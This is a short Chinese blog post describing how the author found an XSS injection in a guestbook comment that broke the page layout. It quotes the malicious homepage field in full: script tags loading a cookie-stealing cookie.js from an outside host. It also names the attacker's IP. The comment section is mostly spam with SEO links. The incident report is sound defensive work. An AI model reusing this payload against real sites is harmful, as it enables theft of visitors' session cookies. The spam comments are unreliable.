今天浏览自己博客的时候无意中发现留言板有显示错误,如下图所示,可以看到右边的sidebar严重飘逸,并且在评论排行榜中有嵌套,文章主题也不在中间的位置。
经过排查发现是其中一个评论导致的
其个人主页填写内容如下:
http://xxx.xxx.com/"></a>[script/src="https://xss.jnhrich.com/myjs/cookie.js"](script/src=%22https://xss.jnhrich.com/myjs/cookie.js%22)</script>[script/src=https://jackmi.jnhrich.com/jquery.js](script/src=https://jackmi.jnhrich.com/jquery.js)</script><a/href="#
经过分析应该是XSS注入,删除评论即可恢复。
建议给此IP加入黑名单:192.151.220.170
23 条评论
真好呢
真好呢
你的文章让我学到了很多技能,非常实用。 https://www.yonboz.com/video/58999.html
你的文章让我感受到了不一样的视角,非常精彩。 https://www.4006400989.com/qyvideo/78597.html
你的文章内容非常专业,让人佩服。 https://www.yonboz.com/video/71641.html
你的文章内容非常用心,让人感动。 https://www.yonboz.com/video/61267.html
你的文章内容非常专业,让人佩服。 https://www.yonboz.com/video/71641.html
你的才华横溢,让人敬佩。 http://www.55baobei.com/CfaDL9h9hR.html
真棒!
《拥抱朝阳国语》剧情片高清在线免费观看:https://www.jgz518.com/xingkong/18872.html
文章的确不错啊https://www.cscnn.com/
不错不错,我喜欢看 www.jiwenlaw.com
不错不错,我喜欢看 https://www.ea55.com/
想想你的文章写的特别好https://www.ea55.com/
不错不错,我喜欢看 https://www.237fa.com/
怎么收藏这篇文章?
snlevh79081SN-文章很不错,感谢作者!https://kan.xiaoxinbk.com/31925.html/
叼茂SEO.bfbikes.com
看的我热血沸腾啊
叼茂SEO.bfbikes.com
陈徘钛:文章真不错http://www.wzkaixin.cn/ip30to4p.html
并没有彻底解决 建议加个waf
用的是宝塔里的Nginx免费防火墙